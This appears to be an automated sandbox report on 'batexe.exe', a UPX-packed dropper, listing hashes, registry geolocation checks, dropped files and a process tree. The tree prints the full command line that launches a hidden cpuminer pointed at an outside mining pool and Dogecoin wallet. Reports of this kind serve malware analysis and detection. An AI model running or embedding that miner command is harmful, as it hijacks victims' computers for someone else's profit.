73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2812	b2e.exe
3760	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe
3760	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3508-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 2812	3508	batexe.exe	85
PID 3508 wrote to memory of 2812	3508	batexe.exe	85
PID 3508 wrote to memory of 2812	3508	batexe.exe	85
PID 2812 wrote to memory of 2524	2812	b2e.exe	86
PID 2812 wrote to memory of 2524	2812	b2e.exe	86
PID 2812 wrote to memory of 2524	2812	b2e.exe	86
PID 2524 wrote to memory of 3760	2524	cmd.exe	89
PID 2524 wrote to memory of 3760	2524	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3508
- C:\Users\Admin\AppData\Local\Temp\B6FC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B6FC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B6FC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B99B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B6FC.tmp\b2e.exe

Filesize
6.6MB

MD5
5e2e1e9e6356a1449f3b81e045a9f295

SHA1
c484c4d38bbdc6de22df726f16e816b5003581dd

SHA256
3038f31b7fd14e6166f00209d703ed197054c58bb267513f3885dc4397be1dc0

SHA512
975d4929bd06387e7668619c930bc1e8430807b29ff27748453f8983731a7eb7e78bc67aa9bf2cc931901ceb4804ba6a246b1179ad6afbca21ea9770a581bbfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6FC.tmp\b2e.exe

Filesize
2.5MB

MD5
3dbd2362ffd4a45aeb3a673192cbe368

SHA1
ff081e0b03c3afd8af5e9259dfe652527eb303fa

SHA256
828f27216f1515c930c2289df947f683748fd29481fd9750cca7efc7ca3e3ad0

SHA512
5d6f90a6103af2e298450debc0334551d653eb03d1108e42d96da11cd35ad409cf8712ad6dbf0a6f603b005d9b322a5481f8535aef2ea852c2f165aa8b16d9c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6FC.tmp\b2e.exe

Filesize
2.1MB

MD5
b982d416645820554f5eadbf76c80bf3

SHA1
3f6028be970e7b1aeb767cd24f57557d99c8c822

SHA256
fccb31252fbc97fbfa7c9f82915672e7f6eabef0521fc1ce906327a876106bc5

SHA512
5c1f62f6299f93a83633abe8e3dc58b69ca1b7f5199bcf7195099e54715d8583c51c7b13519fcd7fff3203803f39137fb089794559d3f0c2baf859e1444bd72c

Download Submit
C:\Users\Admin\AppData\Local\Temp\B99B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.8MB

MD5
ef409e9ec6cfa4b3b2a9363a1e234eed

SHA1
ba58bfddbadb2d353392b64c85aa605db62215e2

SHA256
0a33eaaad11ea7b09a72b615d87b7576690a702c286b01ad36a1c69d1779ce7e

SHA512
c291b33be8e8021d4233877a2ad1611020daa020d1d20edd80b42fb473eea96cf3beb72293635f87ee1ea1013039bb5a031747c1a872881c257df925b112693f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.9MB

MD5
f5f8bbf2d7a6cebe585d77773e64ff9b

SHA1
0024a698fc378016a48cfe03fa4d80196b38d1d8

SHA256
8211c96ee988366b0811e96d4000e3c360902fabdf54c49049e35ee2d497d5ae

SHA512
c05733197c994d127caab95ec6c2853f3d0aa7d68d2a6375d467e26411a0e69352b0c434c2648d65020bdf6d495fac11e2d8e39870e80c5340ca225e80101442

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.0MB

MD5
07fabe43d7b807e61da9f184cb07c91e

SHA1
06f83238109d792ed320bec65f86af828f9e5504

SHA256
82236426354576e6ca930a3154e0995ddcdfdeb180a5deab0df8092d4033290e

SHA512
c2015bccb6f6141cc776ab4dd7ad00fddd79ddaf3a1ff57a1d4f2fffbc22fe222ea31a8b3d7875ebc7bf3f759e7ad3429edb100c74214deb030efcfe819bf84e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.0MB

MD5
24c7e4fc87bd7c5cc850cf90ceb57492

SHA1
4bed0c5041315812650d1ef0cc54f7065606a40d

SHA256
6d6053ab8fac01d9f55a784f49331d299ccc2c307aa499b2a52161979f5a3d20

SHA512
fd3e736a6dfbba8b0a2c642e966332f0a0ea52b8939f2403fcb5ec98bad468fdb5933e039ae564319d7073ef078cb5541a8e4f3ed79957a084684cecbe8c4d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2812-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2812-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3508-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3760-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3760-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3760-47-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/3760-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-46-0x0000000073A60000-0x0000000073AF8000-memory.dmp

Filesize
608KB

Download
memory/3760-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3760-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download